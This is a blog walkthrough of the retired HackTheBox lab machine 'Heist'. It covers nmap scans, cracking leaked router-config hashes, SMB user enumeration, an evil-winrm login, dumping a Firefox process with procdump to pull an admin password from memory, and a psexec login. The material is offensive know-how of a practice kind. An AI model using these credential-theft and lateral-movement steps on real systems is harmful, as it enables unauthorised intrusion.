Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Wed Jul  7 08:15:43 2021 as: nmap -sC -sV -oA nmap 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h00m54s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-07T10:17:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 08:17:41 2021 -- 1 IP address (1 host up) scanned in 118.25 seconds

Another day another HackTheBox machine so we have our Nmap scan result but before going deep let try to scan if we have winrm port open.

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.149]
└─$ nmap -sV -sC -p 5985 10.10.10.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 13:11 WAT
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.56s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds

Seems we have it open now let start our enumeration on SMB first.

image

We have no anonymous access to SMB now let hit HTTP.

image

Trying some default credentials i got no luck also maybe some SQL injection payloads got nothing but we still have Login as guest let try it.

image

Issues comment ground seems cool also a user hazard attach a file let try and check it out.

image

We have some hash passwords that belong to hazard i think now let try cracking all.

image

The website i use in cracking it https://www.ifm.net.nz/cookbooks/passwordcracker.html

0242114B0E143F015F5D1E161713 - $uperP@ssword
02375012182C1A1D751618034F36415408 - Q4)sJu\Y8qz*A3?d

One more hash to go i use john the ripper to crack that.

image

stealth1agent

Now i think we have 3 users and 3 passwords.

USERNAMES;

rout3r
hazard
admin

PASSWORDS;

$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Which have try using on the login page form but i got no luck now time to go back to SMB maybe we can have access to the SMB trying different combination with the credentials i was able to list some shares with hazard:stealth1agent .

image

Now let use lookupsid.py from impacket to enumerate more users.

lookupsid.py hazard:stealth1agent@heist.htb

image

We have more users now but to cut the story short i was able to get in with chase:Q4)sJu\Y8qz*A3?d with winrm using evil-winrm just the way i was able to get hazard password.

evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'

image

Going to the user chase desktop and we have user.txt now we just need to owned the system now.

System / Administrator

I spend time enumerating the box so i notice a firefox process running which is strange.

image

So i uploaded procdump.exe and dumped one of these firefox processes.

upload procdump64.exe
./procdump64.exe -accepteula
./procdump64.exe -ma 2528

Then I uploaded strings.exe.

upload strings64.exe
./strings64.exe -accepteula

image

Now using strings64.exe to view the firefox dump file.

./strings64.exe firefox.exe_210707_175550.dmp

image

Searching for password and i got the admin credentials 4dD!5}x/re8]FBuZ nice time to use psexec.py to log in with the admin credentials we found in the firefox dump.

psexec.py administrator@10.10.10.149

image

We are in and done let get the last flag.

image

And we are system.

Greeting From Muzec



Back To Home